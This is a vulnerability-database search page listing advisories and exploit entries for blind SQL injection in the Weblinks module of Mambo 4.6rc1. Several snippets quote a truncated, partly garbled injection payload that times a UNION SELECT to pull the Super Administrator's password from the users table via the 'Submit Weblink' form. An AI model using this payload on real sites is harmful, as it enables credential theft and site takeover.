Lucene search
K

6 matches found

NVD
NVD
added 2006/06/27 9:5 p.m.22 views

CVE-2006-3262

SQL injection vulnerability in the Weblinks module weblinks.php in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter...

7.5CVSS8.3AI score0.02442EPSS
Exploits1References9
NVD
NVD
added 2006/06/27 9:5 p.m.26 views

CVE-2006-3263

SQL injection vulnerability in the Weblinks module weblinks.php in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the catid parameter...

7.5CVSS8.3AI score0.01106EPSS
Exploits0References1
Cvelist
Cvelist
added 2006/06/27 9:0 p.m.27 views

CVE-2006-3262

SQL injection vulnerability in the Weblinks module weblinks.php in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter...

8.3AI score0.02442EPSS
Exploits1References9
Packet Storm
Packet Storm
added 2006/06/26 12:0 a.m.33 views

mambo_46rc1_sql.txt

!/usr/bin/php -q -d shortopentag=on mysqld --log=mambo.txt now login, go to "Submit Weblink" feature, in "Name: " field type: 99999' UNION SELECT IF ASCIISUBSTRINGpassword,1,1=0 & 1, benchmark200000000,CHAR0,0 FROM mosusers WHERE usertype='Super Administrator'/ in mambo.txt we have: 13 Query SELE...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2006/06/17 12:0 a.m.18 views

Mambo 4.6rc1 - Weblinks Blind SQL Injection (1)

Mambo 4.6rc1 - Weblinks Blind SQL Injection 1 !/usr/bin/php -q -d shortopentag=on mysqld --log=mambo.txt now login, go to "Submit Weblink" feature, in "Name: " field type: 99999' UNION SELECT IF ASCIISUBSTRINGpassword,1,1=0 & 1, benchmark200000000,CHAR0,0 FROM mosusers WHERE usertype='Super...

0.3AI score
Exploits0
0day.today
0day.today
added 2006/06/17 12:0 a.m.92 views

Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ====================================================== Mambo mysqld --log=mambo.txt now login, go to "Submit Weblink" feature, in "Name: " field type: 99999' UNION SELECT IF ASCIISUBSTRINGpassword,1,1=0 & 1, benchmark200000000,CHAR0,0 FROM...

7.1AI score
Exploits0
Rows per page
Query Builder